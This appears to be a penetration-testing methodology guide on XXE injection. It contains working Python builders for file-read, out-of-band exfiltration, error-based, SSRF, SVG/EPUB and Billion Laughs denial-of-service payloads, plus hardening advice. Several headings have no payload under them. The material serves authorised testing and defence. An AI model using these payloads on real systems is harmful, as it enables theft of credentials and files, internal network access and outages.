XML External Entity (XXE) Injection
Shortcut
Find data entry points that you can use to submit XML data.
Determine whether the entry point is a candidate for a classic or blind XXE. The endpoint might be vulnerable to classic XXE if it returns the parsed XML data in the HTTP response. If the endpoint does not return results, it might still be vulnerable to blind XXE, and you should set up a callback listener for your tests.
Try out a few test payloads to see if the parser is improperly configured. In the case of classic XXE, you can check whether the parser is processing external entities. In the case of blind XXE, you can make the server send requests to your callback listener to see if you can trigger outbound interaction.
Try to exfiltrate a common system file, like /etc/hostname.
You can also try to retrieve some more sensitive system files, like /etc/shadow or ~/.bash_history.
If you cannot exfiltrate the entire file with a simple XXE payload, try to use an alternative data exfiltration method.
See if you can launch an SSRF attack using the XXE.
Mechanisms
XML External Entity (XXE) injection is a vulnerability that occurs when an XML parser resolves external entity references in attacker-supplied XML documents. XXE attacks target applications that parse XML input and can lead to:
Disclosure of confidential files and data
Server-side request forgery (SSRF)
Denial of service attacks
Remote code execution in some cases
XXE vulnerabilities arise from XML's Document Type Definition (DTD) feature, which allows defining entities that can reference external resources. When a vulnerable XML parser processes these entities, it retrieves and includes the external resources, potentially exposing sensitive information.
In practice, full remote code execution rarely stems from XXE alone; it typically requires language-specific gadgets—such as PHP's expect:// wrapper or Java deserialization sinks—which XXE merely helps reach.
Types of XXE attacks include:
Classic XXE: Direct extraction of data visible in responses
Blind XXE: No direct output, but data can be exfiltrated through out-of-band techniques
Error-based XXE: Leveraging error messages to extract data
XInclude-based XXE: Using XInclude when direct DTD access is restricted
Hunt
Finding XXE Vulnerabilities
Additional Discovery Methods
Convert content type from "application/json"/"application/x-www-form-urlencoded" to "application/xml"
Check file uploads that allow docx/xlsx/pdf/zip - unzip the package and add XML code into the XML files
Test SVG file uploads for XML injection
Check RSS feeds functionality for XML injection
Fuzz for /soap API endpoints
Test SSO integration points for XML injection in SAML requests/responses
Identify XML Injection Points
API Endpoints: Look for endpoints accepting XML data
File Uploads: Features accepting XML-based files (DOCX, SVG, XML, etc.)
Format Conversion: Services converting to/from XML formats
Legacy Interfaces: SOAP web services, XML-RPC
Hidden XML Parsers: Look for parameters that might be processed as XML behind the scenes
Content Type Conversion: Endpoints that accept JSON but may process XML with proper Content-Type
Test Basic XXE Patterns
For each potential injection point, test with simple payloads:
Classic XXE (file retrieval):
or
Blind XXE (out-of-band detection):
XInclude attack (when unable to define a DTD):
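The three basic probes listed above can be sketched as small payload builders. This is a minimal illustration, not a definitive payload set: the element name foo, the entity name xxe, and the callback URL are placeholders chosen here, and /etc/hostname is used because it is harmless to read.

```python
"""Builders for the three basic XXE probes; hosts, names, and paths are placeholders."""


def classic_xxe(path: str = "/etc/hostname") -> str:
    # The internal DTD declares an external general entity; the body echoes it,
    # so a vulnerable endpoint reflects the file content in its response.
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file://{path}">]>\n'
        "<foo>&xxe;</foo>"
    )


def blind_xxe(callback_url: str) -> str:
    # A parameter entity is resolved while the DTD itself is parsed,
    # so the outbound request happens even if nothing is reflected.
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "{callback_url}"> %xxe;]>\n'
        "<foo>probe</foo>"
    )


def xinclude_probe(path: str = "/etc/hostname") -> str:
    # No DOCTYPE at all: this only works if the server runs XInclude
    # processing on the fragment it embeds into its own document.
    return (
        '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
        f'<xi:include parse="text" href="file://{path}"/>'
        "</foo>"
    )
```

The XInclude variant is the one to try when you control only a single value inside a server-built document and cannot supply a DOCTYPE.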
Billion Laughs Attack Steps
Capture the request in your proxy tool
Send it to repeater and convert body to XML format
Check the Content-Type and Accept headers and change them to application/xml if needed
Convert JSON to XML if no direct XML input is possible
Insert the billion laughs payload between XML tags
Adjust entity references (lol1 to lol9) to control DoS intensity
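The last two steps can be sketched as a generator for the nested-entity document plus a size estimate. This is a rough sketch: the lol/lolN entity names follow the steps above, while the function names and the fanout parameter are introduced here for illustration. Run it only against systems you are authorized to stress, starting with a small number of levels.

```python
def billion_laughs(levels: int = 9, fanout: int = 10, seed: str = "lol") -> str:
    """Build a nested-entity document; each level references the previous one `fanout` times."""
    if levels < 1 or fanout < 1:
        raise ValueError("levels and fanout must be positive")
    decls = [f'<!ENTITY lol "{seed}">']
    prev = "lol"
    for i in range(1, levels + 1):
        name = f"lol{i}"
        refs = f"&{prev};" * fanout
        decls.append(f'<!ENTITY {name} "{refs}">')
        prev = name
    dtd = "\n  ".join(decls)
    return f'<?xml version="1.0"?>\n<!DOCTYPE lolz [\n  {dtd}\n]>\n<lolz>&{prev};</lolz>'


def expanded_size(levels: int = 9, fanout: int = 10, seed: str = "lol") -> int:
    """Characters the root element would expand to if the parser applies no limit."""
    return len(seed) * fanout ** levels
```

With the defaults, expanded_size() is 3,000,000,000 characters from a document of under a kilobyte, which is why lowering levels (lol9 down to, say, lol3) is the practical way to control intensity.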
Check Alternative XML Formats
SVG files:
or
DOCX/XLSX files: Modify internal XML files (e.g., word/document.xml)
SOAP messages: Test XXE in SOAP envelope
SAML 2.0 XXE Testing
SAML assertions are prime XXE targets. Test both requests and responses:
AuthnRequest XXE:
Response Assertion XXE:
Encrypted Assertion XXE (Response Wrapping):
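As a rough illustration of the AuthnRequest case, the sketch below wraps a DOCTYPE around a skeletal request and encodes it for the two common SAML bindings. The template is deliberately minimal and is an assumption, not a request any particular identity provider will accept as-is; the ID, timestamp, and callback URL are placeholders. Whether a signed message is parsed before its signature is checked depends on the implementation under test.

```python
import base64
import zlib

# Skeletal AuthnRequest; {target} is the URI the external entity points at.
AUTHN_TEMPLATE = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{target}">]>\n'
    '<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" '
    'xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" '
    'ID="_test" Version="2.0" IssueInstant="2024-01-01T00:00:00Z">'
    "<saml:Issuer>&xxe;</saml:Issuer>"
    "</samlp:AuthnRequest>"
)


def encode_post_binding(xml: str) -> str:
    # HTTP-POST binding: plain base64 of the XML document.
    return base64.b64encode(xml.encode("utf-8")).decode("ascii")


def encode_redirect_binding(xml: str) -> str:
    # HTTP-Redirect binding: raw DEFLATE (no zlib header), then base64.
    # URL-encode the result before placing it in the SAMLRequest parameter.
    compressor = zlib.compressobj(wbits=-15)
    raw = compressor.compress(xml.encode("utf-8")) + compressor.flush()
    return base64.b64encode(raw).decode("ascii")


def decode_redirect_binding(value: str) -> str:
    # Inverse of encode_redirect_binding, useful for inspecting captured requests.
    return zlib.decompress(base64.b64decode(value), wbits=-15).decode("utf-8")
```

In practice you would decode a captured SAMLRequest or SAMLResponse, insert the DOCTYPE into the real message, and re-encode it with the matching binding.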
E-book Format Exploitation (EPUB)
EPUB files are ZIP archives containing XML. Target library management systems and e-reader apps:
Attack workflow:
Create legitimate EPUB file
Extract contents (it's a ZIP)
Inject XXE into META-INF/container.xml or content.opf
Re-zip and upload to target (library systems, e-commerce platforms)
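The extract, inject, and re-zip steps can be done in memory. The sketch below is one possible approach under stated assumptions: the DOCTYPE uses a parameter entity pointing at a placeholder callback URL, and the function names are made up for this example. The same routine should work for other ZIP-based formats such as DOCX by changing the member name (for example word/document.xml).

```python
import io
import zipfile

# Placeholder probe: a parameter entity fetched while the DTD is parsed.
DOCTYPE = '<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://callback.example/epub"> %xxe;]>'


def inject_doctype(xml_text: str, doctype: str = DOCTYPE) -> str:
    """Place a DOCTYPE after the XML declaration (or at the start if there is none)."""
    if xml_text.lstrip().startswith("<?xml"):
        end = xml_text.index("?>") + 2
        return xml_text[:end] + "\n" + doctype + xml_text[end:]
    return doctype + "\n" + xml_text


def repack(archive: bytes, member: str = "META-INF/container.xml") -> bytes:
    """Copy a ZIP-based document, rewriting one XML member with the injected DOCTYPE."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(archive)) as src, zipfile.ZipFile(out, "w") as dst:
        for info in src.infolist():
            data = src.read(info.filename)
            if info.filename == member:
                data = inject_doctype(data.decode("utf-8")).encode("utf-8")
            # Reusing the ZipInfo keeps each member's name, order, and compression
            # type (EPUB expects an uncompressed `mimetype` entry first).
            dst.writestr(info, data)
    return out.getvalue()
```

Typical use would be `open("probe.epub", "wb").write(repack(open("book.epub", "rb").read()))`, where both file names are examples.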
Apple Universal Links XXE
iOS deep linking configuration files:
Advanced XXE Hunting
Parameter Entity Testing
Error-Based XXE
XXE via Content-Type Manipulation
Try changing Content-Type header from:
to:
or:
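A minimal sketch of the switch, assuming the original request body is JSON and the target type is application/xml as mentioned under Additional Discovery Methods. The root element name and the helper names are assumptions; the element layout a given backend expects may differ, so treat the output as a starting point.

```python
import json
from xml.sax.saxutils import escape


def json_to_xml(body: str, root: str = "root") -> str:
    """Convert a JSON object into element-per-key XML."""

    def render(name: str, value) -> str:
        if isinstance(value, list):
            # Repeat the element once per list item.
            return "".join(render(name, item) for item in value)
        if isinstance(value, dict):
            inner = "".join(render(k, v) for k, v in value.items())
        else:
            inner = escape(str(value))
        return f"<{name}>{inner}</{name}>"

    return '<?xml version="1.0" encoding="UTF-8"?>' + render(root, json.loads(body))


def as_xml_request(json_body: str) -> tuple[dict, str]:
    # Same data, different Content-Type. A JSON-only endpoint should reject this,
    # while a permissive framework may hand the body to an XML parser.
    headers = {"Content-Type": "application/xml"}
    return headers, json_to_xml(json_body)
```

If the endpoint accepts the converted body, add a DOCTYPE to it and repeat the basic probes.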
Chaining and Escalation
Cloud-Native & Kubernetes XXE
Kubernetes Admission Webhook XXE
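Admission webhooks registered through ValidatingWebhookConfiguration and MutatingWebhookConfiguration receive AdmissionReview requests as JSON, so XXE becomes relevant only when a webhook passes XML embedded in the object (for example, a ConfigMap value or annotation) to an XML parser: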
Exploitation flow:
ConfigMap XXE:
CI/CD Pipeline XXE
Jenkins XML Config Parsing:
GitLab CI Artifact Processing:
GitHub Actions Workflow:
Maven/Gradle Dependency Confusion:
Parser Misconfigurations
DTD Processing Enabled: The parser accepts DOCTYPE declarations in untrusted input
External Entity Resolution: The parser fetches the resources that external entities reference
XInclude Support: The parser processes XInclude statements in untrusted input
Missing Entity Validation: No limit on entity expansion depth or size
File Disclosure via XXE
Local File Access: Reading sensitive system files
/etc/passwd (Unix user information)
/etc/shadow (password hashes on Linux)
C:\Windows\system32\drivers\etc\hosts (Windows hosts file)
Application configuration files
Source code files
Database credentials
SSRF via XXE
Internal Network Access: Scanning internal systems
Cloud Metadata Access: Accessing metadata services
AWS IMDSv2 (Token-based, harder via XXE):
Azure Instance Metadata:
GCP Metadata v2 (2024+):
Workarounds for header-protected metadata:
Denial of Service
Billion Laughs Attack: Exponential entity expansion
Quadratic Blowup Attack: A single large entity referenced many times, so the expanded size grows with entity length multiplied by reference count
External Resource DoS: Loading large or never-ending external resources
Bypass Techniques
Filter Evasion Techniques
Case Variation:
Alternative Protocol Schemes:
URL Encoding:
XXE in CDATA Sections
XXE via XML Namespace
PHP Wrapper inside XXE
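A minimal sketch of this technique, assuming a PHP target whose parser resolves external entities: the php://filter wrapper base64-encodes the file so that characters such as < and & cannot break the surrounding XML. The function names and the default path are illustrative.

```python
import base64


def php_filter_payload(resource: str = "/etc/hostname") -> str:
    # php://filter base64-encodes the file before it is substituted for &xxe;,
    # which also makes PHP source files readable without being executed.
    uri = f"php://filter/convert.base64-encode/resource={resource}"
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{uri}">]>\n'
        "<foo>&xxe;</foo>"
    )


def decode_leak(encoded: str) -> str:
    """Decode the base64 text returned in place of &xxe;."""
    return base64.b64decode(encoded.strip()).decode("utf-8", errors="replace")
```

Copy the base64 blob out of the response and pass it to decode_leak to recover the original file content.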
Methodologies
Tools
XXE Detection and Exploitation Tools
OWASP ZAP: XML External Entity scanner
Burp Suite Pro: XXE scanner extension
XXEinjector: Automated XXE testing tool
XXE-FTP: Out-of-band XXE exploitation framework
dtd.gen: DTD generator for XXE exfiltration
oxml_sec: Tool for testing XXE in OOXML files (docx, xlsx, pptx)
Burp Suite Pro 2025.2+ (“Burp AI”): automatically chains scanner-found XXE with out-of-band callbacks for quicker triage.
Semgrep rules (java-xxe, python-xxe): static analysis that flags un-hardened XML parser usage.
Setup Tools for Out-of-Band Testing
Interactsh: Interaction collection server
Burp Collaborator: For out-of-band data detection
XSS Hunter: Can be repurposed for XXE callbacks
Python http.server (SimpleHTTPServer in Python 2): Quick HTTP server for receiving callbacks and hosting DTD files
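When none of the hosted services above is available, a small listener built on Python's standard http.server module is often enough to confirm an outbound interaction. This is a sketch for lab use: the hits list, CallbackHandler, and start_listener are names made up for this example, and a real test needs the listener on an address the target can reach.

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

hits: list[tuple[str, str]] = []  # (client address, requested path)


class CallbackHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Record who called back and what they asked for, then send an empty 200.
        hits.append((self.client_address[0], self.path))
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, format, *args):
        pass  # keep the console quiet; `hits` is the record


def start_listener(host: str = "127.0.0.1", port: int = 0) -> HTTPServer:
    """Start the listener in a background thread; port 0 picks a free port."""
    server = HTTPServer((host, port), CallbackHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

Put a unique token in each probe URL (for example /probe?id=upload-form) so that entries in hits can be matched to the injection point that triggered them.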
Testing Methodologies
Basic Testing Process
Identify XML Processing: Locate endpoints accepting XML input
Setup Monitoring: Prepare out-of-band detection for blind XXE
Injection Testing: Test with basic XXE payloads
Result Analysis: Check for direct data exposure or callbacks
Vulnerability Confirmation: Attempt to read a harmless file like /etc/hostname
Advanced Exploitation Techniques
Data Exfiltration (for Blind XXE)
Host a malicious DTD file on your server:
Use an XXE payload that references your DTD:
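The two pieces can be sketched as follows. This is the commonly used nested parameter-entity pattern, shown under assumptions: the entity names (file, eval, exfil, remote), the d query parameter, and the URLs are placeholders. It tends to work only for short, single-line files such as /etc/hostname, because many parsers reject URLs containing newlines.

```python
def exfil_dtd(collect_url: str, path: str = "/etc/hostname") -> str:
    """DTD to host on the tester's server."""
    return (
        f'<!ENTITY % file SYSTEM "file://{path}">\n'
        # &#x25; is "%": the inner declaration only takes shape when %eval; is
        # expanded, by which point %file; has been replaced with the file content.
        f"<!ENTITY % eval \"<!ENTITY &#x25; exfil SYSTEM '{collect_url}?d=%file;'>\">\n"
        "%eval;\n"
        "%exfil;\n"
    )


def oob_payload(dtd_url: str) -> str:
    """Document sent to the target; it only pulls in the remote DTD."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE foo [<!ENTITY % remote SYSTEM "{dtd_url}"> %remote;]>\n'
        "<foo>probe</foo>"
    )
```

The indirection through a hosted DTD is needed because the XML specification does not allow parameter-entity references inside markup declarations in the internal subset.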
XXE OOB with DTD and PHP filter
Payload:
External DTD (http://your-attacker-server.com/dtd.xml):
Error-Based Exfiltration
Host a malicious DTD with error-based exfiltration:
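A sketch of such a DTD, plus a helper for pulling the leaked text out of an error message. The marker directory is a made-up, non-existent path chosen so it is easy to find in the error; the entity names and the helper are assumptions, and the exact error format varies by parser and language.

```python
MARKER = "/xxe-marker/"  # hypothetical directory that must not exist on the target


def error_dtd(path: str = "/etc/hostname") -> str:
    # The parser tries to open file:///xxe-marker/<file content>, fails, and
    # (on verbose targets) echoes the full path, content included, in the error.
    return (
        f'<!ENTITY % file SYSTEM "file://{path}">\n'
        f"<!ENTITY % eval \"<!ENTITY &#x25; error SYSTEM 'file://{MARKER}%file;'>\">\n"
        "%eval;\n"
        "%error;\n"
    )


def leaked_text(error_message: str):
    """Return whatever follows the marker in a parser error, or None if absent."""
    _, found, tail = error_message.partition(MARKER)
    return tail.strip() if found else None
```

Some runtimes append their own suffix to the path in the error (for example a "No such file" note), so expect to trim the result by hand.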
XXE for SSRF
Use XXE to trigger internal requests:
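A minimal sketch of this idea: the entity's system identifier is simply an internal URL, and a small generator produces one payload per host and port. The hosts, ports, and function names are illustrative assumptions; differences in response content, error text, or timing are what usually distinguish reachable services from closed ports.

```python
def ssrf_payload(url: str) -> str:
    # The parser, not the tester, makes the request, so the URL is resolved
    # from inside the target's network.
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{url}">]>\n'
        "<foo>&xxe;</foo>"
    )


def internal_targets(hosts, ports=(80, 8080, 8443)):
    """Yield (url, payload) pairs for a small internal sweep."""
    for host in hosts:
        for port in ports:
            url = f"http://{host}:{port}/"
            yield url, ssrf_payload(url)
```

Keep sweeps small and within the agreed scope; each payload causes a real request from the target.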
XXE Inside SOAP
XXE PoC Examples
XXE via File Upload (SVG Example)
Create an SVG file with the payload:
Upload it where SVG is allowed (e.g., profile picture, comment attachment).
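One way to produce such a file is sketched below. The entity is placed in a text element so that, if the server renders or rasterizes the SVG with a vulnerable parser, the file content may show up in the resulting image. The dimensions, entity name, and function name are arbitrary choices for this example.

```python
def svg_xxe(path: str = "/etc/hostname", width: int = 300, height: int = 60) -> str:
    """Return SVG markup whose <text> element references an external entity."""
    return (
        '<?xml version="1.0" standalone="yes"?>\n'
        f'<!DOCTYPE svg [<!ENTITY xxe SYSTEM "file://{path}">]>\n'
        f'<svg xmlns="http://www.w3.org/2000/svg" width="{width}" height="{height}">\n'
        '  <text x="0" y="20" font-size="16">&xxe;</text>\n'
        "</svg>\n"
    )
```

Write the returned string to a file with an .svg extension before uploading, then check the rendered thumbnail or converted image for the leaked text.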
Comprehensive XXE Testing Checklist
Basic entity testing:
Test file access via file:// protocol
Test network access via http:// protocol
Content delivery:
Direct XXE with immediate results
Out-of-band XXE with remote DTD
Error-based XXE for data extraction
Protocol testing:
Test various protocols (file, http, https, ftp, etc.)
Attempt restricted protocol access
Format variations:
Test XXE in SVG uploads
Test XXE in document formats (DOCX, XLSX, PDF)
Test SOAP/XML-RPC interfaces
Bypasses:
Try character encoding tricks
Use nested entities
Apply URL encoding
Test with namespace manipulations
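As one example of a character encoding trick from the checklist above, a payload can be re-encoded as UTF-16 so that byte-level filters looking for ASCII strings such as <!ENTITY no longer match, while a conforming parser still decodes it. This is a sketch; the function name is made up, and whether the target accepts UTF-16 bodies has to be tested.

```python
def to_utf16(xml_text: str) -> bytes:
    """Re-encode an XML payload as UTF-16 with a BOM and a matching declaration."""
    body = xml_text
    if body.startswith("<?xml"):
        # Drop the old declaration so the encoding it names cannot conflict.
        body = body[body.index("?>") + 2:].lstrip()
    declared = '<?xml version="1.0" encoding="UTF-16"?>\n' + body
    return declared.encode("utf-16")  # Python prepends the byte-order mark
```

Send the bytes with a matching header, for example Content-Type: application/xml; charset=utf-16.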
Remediation Recommendations
Disable DTD processing completely if possible
Disable external entity resolution
Implement proper input validation
Use safe XML parsers that disable XXE by default
Apply patch management to XML parsers
Use newer API formats like JSON where feasible
Network egress allow-list: Restrict outbound traffic from XML-parsing hosts to block blind-XXE callbacks.
API Gateway XML Protection: Implement XML threat protection at the gateway layer
API Gateway XML Threat Protection
AWS API Gateway
Kong Gateway
Apigee Edge
Nginx + ModSecurity
Parser default hardening (2024-2025)
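libxml2 ≥ 2.13: the XML_PARSE_NO_XXE parser option disables all external entity and DTD loading. It is an option the application must set, so pass it explicitly rather than relying on defaults.
Python: the standard xml.sax parser has not processed external general entities by default since 3.7.1; they can be re-enabled only via xml.sax.handler.feature_external_ges.
.NET 8: XmlReaderSettings.DtdProcessing defaults to Prohibit.
Java 22: XMLConstants.FEATURE_SECURE_PROCESSING applies processing limits but should not be relied on to block external entities. Set the external-general-entities feature to false explicitly and verify the effective defaults on the JDK in use.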
Cloud-metadata nuance
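AWS IMDSv2 requires a session token: the client must first obtain one with PUT /latest/api/token and then pass it in the X-aws-ec2-metadata-token header of subsequent requests. An entity fetch triggered by XXE is normally a plain GET with no custom headers, so XXE alone usually cannot complete this flow against an instance that enforces IMDSv2.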
Secure Parser Configuration (practical snippets)
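As one practical snippet, the sketch below shows a way to refuse any document that carries a DOCTYPE using only the Python standard library, following the "disable DTD processing completely" recommendation. It is an illustration under assumptions, not a complete hardening guide: DTDForbidden and parse_untrusted are names introduced here, and the two-pass design trades some speed for simplicity. A maintained third-party package such as defusedxml covers more cases and may be preferable in production.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DTDForbidden(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # Called by expat as soon as a DOCTYPE starts, before any entity is declared.
    raise DTDForbidden(f"DOCTYPE declarations are not allowed (root: {name})")


def parse_untrusted(data: bytes) -> ET.Element:
    """Parse XML only if it carries no DOCTYPE, which rules out entity-based XXE."""
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    checker.Parse(data, True)   # first pass: raises DTDForbidden on any DOCTYPE
    return ET.fromstring(data)  # second pass: build the tree
```

Rejecting the DOCTYPE outright also blocks entity-expansion attacks such as Billion Laughs, since both rely on entity declarations inside a DTD.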